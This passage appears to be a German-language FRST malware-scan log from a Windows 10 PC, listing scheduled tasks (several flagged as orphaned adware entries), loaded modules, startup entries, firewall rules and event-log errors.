Task: {377F221C-47EF-4C4D-93AC-708AC0ABB8B9} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {396A2551-0AB1-4FE9-BED9-F057CF29CB2B} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {48BCCA7F-E9A5-4128-8E37-AE55AEFECA8E} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {4F5C5854-312A-4A24-ABDF-3C644FC226F6} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {55B0D6D1-C72E-49EF-B7F0-5C87D9BFE997} - \eAHPeNhIUJCheckTask -> Keine Datei <==== ACHTUNG
Task: {5A0191B5-5F68-4856-A343-DE3E25F99E5C} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {5D51534D-F177-4E19-B56B-21112F1A3483} - \ffgogogoBrowserUpdateCore -> Keine Datei <==== ACHTUNG
Task: {6152FDF3-58E5-498E-9CF3-A9D7D429B80B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-03-11] (Piriform Ltd)
Task: {671B6DA2-50FC-4121-874E-571D617F7B32} - \eAHPeNhIUJBrowserUpdateCore -> Keine Datei <==== ACHTUNG
Task: {6EEAF9D3-CC5F-4E6C-AC88-9DE7780771E9} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {70BAF52C-C324-4265-94E7-6336FBE7590E} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-04-15] (Microsoft Corporation)
Task: {732820F9-0FDC-4FC9-963F-25C3A2BA94B2} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe [2016-03-29] (AVG Technologies CZ, s.r.o.)
Task: {7E44129D-761D-427B-8DC4-16D8E966F159} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {8D3866F9-766B-48DB-A578-5C21B7EA69AC} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {92C84F68-7305-4AC7-833F-BA67477E36CA} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {A1AE644B-6680-4D57-99C4-1FE32BE13D5B} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {A65B8F6D-A713-47F9-BB7D-735498D1C450} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-29] (Google Inc.)
Task: {AE71EAE0-A9B0-45EB-AC26-7137D2C92B00} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {B1CD5B0C-693D-4B7C-8323-C9FD491903EE} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {BAAAEC1C-119B-4660-A593-B5D97C4B8E6F} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {BCE21238-B804-496C-973D-49332B4BC6AE} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {C4675849-A54C-4834-BC5A-7D6ABA4BBB54} - \eAHPeNhIUJBrowserUpdateUA -> Keine Datei <==== ACHTUNG
Task: {C5625BD7-9D7F-45B0-8F71-CA915B4E0814} - System32\Tasks\Microsoft\Windows Embedded\Embedded App Launcher Startup => C:\Windows\system32\embeddedapplauncher.exe [2015-07-10] (Microsoft Corporation)
Task: {C6EA2FDA-643C-4333-A577-9FC6BC26272E} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {CB480BD6-186E-467C-B81B-091E970277CF} - \ffgogogoCheckTask -> Keine Datei <==== ACHTUNG
Task: {CB660142-85F0-4F75-BF5F-CB86DACA85E2} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {CB6A3A7A-6827-4E97-90B5-33E9ED0C759B} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {D128CD79-AA9A-4682-9905-F14DB406D448} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {DADEF66A-B64F-42F7-84E8-039E9C3B9E69} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {DC4BE421-18AF-4C9E-9FFF-D48C8C6478E4} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {E653ACD2-7CC0-4B7B-9D01-730295A1F3D8} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {E6589D93-3FA5-49AF-9B33-493ACA29767E} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {E7892EEF-4D43-4930-B9D0-5C8888186A36} - System32\Tasks\{812DDBC9-50E6-4521-ABD6-CA97EAF205AD} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&amp;ver=7.7.0.103&amp;LastError=-3
Task: {E95F50C4-F888-4E6C-BAC1-02665CC2F866} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-04-06] (Hewlett-Packard)
Task: {EE3BDAA5-ED46-440A-8650-A160485AA160} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-07-10 13:00 - 2015-07-10 13:00 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-07-29 23:03 - 2015-07-15 04:04 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-08-19 18:06 - 2015-08-11 11:14 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 01329936 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-08-01 20:56 - 2015-08-02 16:03 - 00076152 _____ () C:\WINDOWS\SysWOW64\PnkBstrA.exe
2016-04-15 17:10 - 2016-03-16 06:55 - 02495768 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-15 17:10 - 2016-03-16 06:55 - 02495768 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-04-19 12:34 - 2016-04-19 12:34 - 00959176 _____ () C:\Users\Harun\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\amd64\ClientTelemetry.dll
2015-10-01 09:51 - 2015-09-17 07:48 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-07-10 12:59 - 2015-07-10 12:59 - 00143360 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\XamlTileRendering.dll
2015-12-10 13:38 - 2015-11-25 06:20 - 06569472 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-10 13:38 - 2015-11-25 06:17 - 00471040 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-10 13:38 - 2015-11-25 06:17 - 01808384 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-01 09:51 - 2015-09-17 07:43 - 02274816 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-07-10 13:00 - 2015-07-10 18:43 - 00210432 _____ () C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
2016-04-19 13:12 - 2016-04-06 12:04 - 01675928 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.112\libglesv2.dll
2016-04-19 13:12 - 2016-04-06 12:04 - 00086168 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.112\libegl.dll
2016-04-10 17:32 - 2016-04-10 17:31 - 40500224 _____ () C:\Program Files (x86)\AVG\UiDll\2171\libcef.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\WINDOWS\Temp:$DATA [16]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2009-06-10 23:00 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-2630849102-760198568-3561441068-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run: => "StartCN"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "Raptr"
HKLM\...\StartupApproved\Run32: => "PlaysTV"
HKLM\...\StartupApproved\Run32: => "mbot_en_037050261"
HKLM\...\StartupApproved\Run32: => "win_en_77"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\StartupFolder: => "Xfire2.bat"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "Spotify Web Helper"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "BingSvc"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "CCleaner Monitoring"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{EF9BA6B0-D956-4E04-A56D-B2D010471C6C}] => (Allow) A:\Steam\bin\steamwebhelper.exe
FirewallRules: [{8C66906E-1DAA-4F0B-88E4-E0163476C022}] => (Allow) A:\Steam\bin\steamwebhelper.exe
FirewallRules: [{B3BD4173-9D91-493E-9FA0-7BCAB414DBB8}] => (Allow) A:\Battle.net\Battle.net.exe
FirewallRules: [{04697792-0727-44EB-82BB-90E6B7E101BA}] => (Allow) A:\Battle.net\Battle.net.exe
FirewallRules: [{29D5CD28-05A0-4A40-8780-02DADE66DA50}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{3E4AF0F9-5D5F-47A5-89C3-8483E1874B3C}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{632E65A2-F35B-4491-A894-4259D389B688}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{DA65680E-6E44-4201-B745-F198AC8E3393}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [TCP Query User{52257645-0630-45E9-A1FB-39934F6C2678}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{4FE86D86-4126-4CAC-B0C6-0964BDDF3F14}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [{79EA3DA0-E438-4DF1-B00E-395F81892905}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{9074E1C2-24F4-4C85-931B-F7C36B46E9F0}] => (Allow) A:\Steam\Steam.exe
FirewallRules: [{88748628-27A1-4BE3-A512-B5BEDB3F0CBC}] => (Allow) A:\Steam\Steam.exe
FirewallRules: [{1064F6A1-CED6-4E5B-9557-D4C9CE2276C3}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4_x86.exe
FirewallRules: [{F2EF9A12-86E9-472C-A3D4-94A1F9A17C0A}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4_x86.exe
FirewallRules: [{EAA7D367-AABF-426D-BB3F-EF9A70667017}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4.exe
FirewallRules: [{98D524D2-5FAB-47A1-8D96-609F4621339A}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4.exe
FirewallRules: [{54390D52-B160-4427-922D-9E33F5445695}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5AAA1481-9998-4568-8A9B-D962D4EC35DF}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{AFF1319A-917A-4107-A1B8-16C203B38CE3}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{6E5BD0D9-0928-42F6-B0CC-6822D671F49E}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{4EF4C32F-BB8F-4765-B97F-A9006BD42435}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{6B0C9A6B-F6E7-4A35-9EB7-6D1B664D401A}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{D0D01B7E-5143-44D9-AC6A-CC67DA9DC212}] => (Allow) A:\Program Files (x86)\Origin Games\BFH\BFHWebHelper.exe
FirewallRules: [{F3E54CC2-1149-412B-936A-B7B404D80F42}] => (Allow) A:\Program Files (x86)\Origin Games\BFH\BFHWebHelper.exe
FirewallRules: [TCP Query User{7198F59F-7EF5-4103-881C-0D8F7DF8701B}A:\program files (x86)\origin games\bfh\bfh.exe] => (Allow) A:\program files (x86)\origin games\bfh\bfh.exe
FirewallRules: [UDP Query User{80C05AF5-C686-4759-B28B-9A8FEF736C4C}A:\program files (x86)\origin games\bfh\bfh.exe] => (Allow) A:\program files (x86)\origin games\bfh\bfh.exe
FirewallRules: [{277B4264-74AC-4424-97C4-6D6C0796EF8F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{29E298B7-7591-4640-AD04-9B5F1E53CBA1}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{E35884C9-26D9-4EAD-9D40-2E56C22777E7}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{085256D1-31AD-4037-8168-D364B01EBC13}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [TCP Query User{B4514ECE-E440-46E1-B1D2-26717681B1E0}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [UDP Query User{6A8D13A6-8290-4176-8559-5F33EC7ED562}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [TCP Query User{821D4B6B-A2AB-4689-9063-D6F980672A77}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{D00ED757-645B-41E0-BFF0-EFEEBB5995ED}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{823DAAEE-6ABF-4B05-BDB9-383B0D21FE83}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [UDP Query User{BB735679-47B3-409A-8738-29CA284AA409}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [TCP Query User{6EE9145F-17C0-43E7-87FF-67A36AF241E7}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{97AB465D-9EFC-47C7-BF64-913694D80FCA}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{19645894-3D5C-4408-A5F6-9B66DFB1DC9F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{AA0EA854-6DFB-4B81-8D5C-1056DC11E33C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{1FB21FF6-AB11-484B-8ADB-638F34153E99}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{48F1500B-0F5A-488B-A6C2-4E310ADB9290}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{3C2F26B4-E13F-4E26-B187-60BDB19D986F}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{16CB5095-C60B-4A9A-AF40-FFF4FF667E4A}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{302047B4-E0E7-4AE6-96B2-BDD4D5C4307D}] => (Allow) A:\iTunes.exe
FirewallRules: [{4C2E216B-3F5D-4DC6-B3E5-D777C482C8FC}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Wiederherstellungspunkte =========================

ACHTUNG: Systemwiederherstellung ist deaktiviert

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (04/20/2016 05:26:14 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3812) Es konnte keine neue Protokolldatei erstellt werden, weil die Datenbank nicht auf das Protokolllaufwerk schreiben kann. Das Laufwerk ist möglicherweise schreibgeschützt, falsch konfiguriert, beschädigt oder hat zu wenig freien Speicherplatz. Fehler -1032.

Error: (04/20/2016 05:26:14 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3812) Der Versuch, die Datei "C:\WINDOWS\system32\edbtmp.log" zu erstellen, ist mit Systemfehler 5 (0x00000005): "Zugriff verweigert " fehlgeschlagen. Fehler -1032 (0xfffffbf8) beim Erstellen von Dateien.

Error: (04/20/2016 05:26:04 PM) (Source: ESENT) (EventID: 454) (User: )
Description: SettingSyncHost (3812) {844FD766-FB5C-4623-B8F4-CECC2FECC873}: Unerwarteter Fehler "-1032" bei der Datenbankwiederherstellung.

Error: (04/20/2016 05:26:04 PM) (Source: ESENT) (EventID: 454) (User: )
Description: SettingSyncHost (3812) {984CE7A3-7187-4D02-9829-7102DC7B4837}: Unerwarteter Fehler "-1216" bei der Datenbankwiederherstellung.

Error: (04/20/2016 05:26:04 PM) (Source: ESENT) (EventID: 494) (User: )
Description: SettingSyncHost (3812) {984CE7A3-7187-4D02-9829-7102DC7B4837}: Fehler -1216 bei der Datenbankwiederherstellung, da Verweise auf die Datenbank "C:\Users\Harun\AppData\Local\Microsoft\Windows\SettingSync\remotemetastore\v1\meta.edb" festgestellt wurden, die nicht mehr vorhanden ist. Die Datenbank wurde nicht sauber heruntergefahren, bevor sie entfernt (oder möglicherweise verschoben oder umbenannt) wurde. Das Datenbankmodul lässt den Abschluss der Wiederherstellung für diese Instanz erst dann zu, wenn die fehlende Datenbank wieder verfügbar gemacht wird. Wenn die Datenbank tatsächlich nicht mehr verfügbar oder nicht mehr erforderlich ist, finden Sie Informationen zum Beheben dieses Fehlers in der Microsoft Knowledge Base oder unter dem Link "Weitere Informationen" am Ende dieser Meldung.

Error: (04/20/2016 05:26:04 PM) (Source: ESENT) (EventID: 490) (User: )
Description: SettingSyncHost (3812) {844FD766-FB5C-4623-B8F4-CECC2FECC873}: Der Versuch, die Datei "C:\Users\Harun\AppData\Local\Microsoft\Windows\SettingSync\remotemetastore\v1\edb.log" für den Lese-/Schreibzugriff zu öffnen, ist mit Systemfehler 32 (0x00000020): "Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird. " fehlgeschlagen. Fehler -1032 (0xfffffbf8) beim Öffnen von Dateien.

Error: (04/20/2016 05:26:04 PM) (Source: ESENT) (EventID: 490) (User: )
Description: SettingSyncHost (3812) {984CE7A3-7187-4D02-9829-7102DC7B4837}: Der Versuch, die Datei "C:\Users\Harun\AppData\Local\Microsoft\Windows\SettingSync\remotemetastore\v1\meta.edb" für den Lese-/Schreibzugriff zu öffnen, ist mit Systemfehler 32 (0x00000020): "Der Prozess kann nicht auf die Datei zugreifen, da sie von einem anderen Prozess verwendet wird. " fehlgeschlagen. Fehler -1032 (0xfffffbf8) beim Öffnen von Dateien.

Error: (04/16/2016 06:13:41 PM) (Source: Perflib) (EventID: 1023) (User: )
Description: rdyboost4

Error: (04/16/2016 06:13:41 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: BITSC:\Windows\System32\bitsperf.dll4

Error: (04/16/2016 10:01:24 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm SndVol.exe, Version 10.0.10240.16384 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 1b34

Startzeit: 01d197b0a249f565

Beendigungszeit: 2

Anwendungspfad: C:\Windows\System32\SndVol.exe

Berichts-ID: 676b8fbe-03a9-11e6-9c27-bcaec571bf31

Vollständiger Name des fehlerhaften Pakets:

Auf das fehlerhafte Paket bezogene Anwendungs-ID:


Systemfehler:
=============
Error: (04/20/2016 05:29:54 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "Xbox Live Authentifizierungs-Manager" wurde mit dem folgenden dienstspezifischen Fehler beendet:
%%0

Error: (04/20/2016 05:23:52 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTLokaler DienstS-1-5-19LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar

Error: (04/20/2016 05:21:57 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenzugriff_Session2" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/20/2016 05:21:57 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenspeicher _Session2" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/20/2016 05:21:57 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Kontaktdaten_Session2" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/20/2016 05:21:57 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_Session2" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/20/2016 11:22:35 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenzugriff_Session1" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/20/2016 11:22:35 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenspeicher _Session1" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/20/2016 11:22:35 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Kontaktdaten_Session1" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/20/2016 11:22:35 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_Session1" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.


CodeIntegrity:
===================================
  Date: 2016-04-20 19:21:20.346
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-20 19:21:20.249
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-20 19:21:20.170
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-20 19:21:20.092
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-20 19:21:20.014
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-20 19:21:19.936
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-20 19:21:19.843
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-20 19:21:19.749
